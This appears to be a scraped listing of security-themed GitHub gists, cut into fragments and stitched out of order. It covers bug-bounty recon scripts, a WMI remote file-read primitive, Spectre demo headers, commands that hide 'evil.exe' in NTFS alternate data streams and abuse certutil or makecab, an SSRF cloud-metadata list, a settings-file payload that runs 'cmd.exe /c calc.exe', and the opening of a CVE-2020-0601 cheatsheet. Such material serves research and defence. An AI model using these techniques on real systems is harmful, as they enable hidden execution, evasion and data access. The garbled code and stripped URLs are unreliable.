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UniIsland /
Created August 14, 2012 04:01
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = '*.%s/*&output=json&fl=original&collapse=urlkey' % host
url = '*&output=json&fl=original&collapse=urlkey' % host
EdOverflow /
Last active January 30, 2025 22:58
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python --org organization -o /tmp/output
mattifestation / FileReadPrimitive.ps1
Last active June 12, 2023 16:33
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
ErikAugust / spectre.c
Last active January 5, 2025 07:01
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#include <x86intrin.h> /* for rdtscp and clflush */
api0cradle /
Last active February 25, 2025 08:33
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\ c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\

jhaddix / cloud_metadata.txt
Last active February 28, 2025 11:03 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
<?xml version="1.0" encoding="UTF-8"?>
<SearchableContent xmlns="">
<DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
SwitHak /
Last active February 9, 2024 14:42
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC

CVE-2020-0601 AKA ChainOfFools OR CurveBall


  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.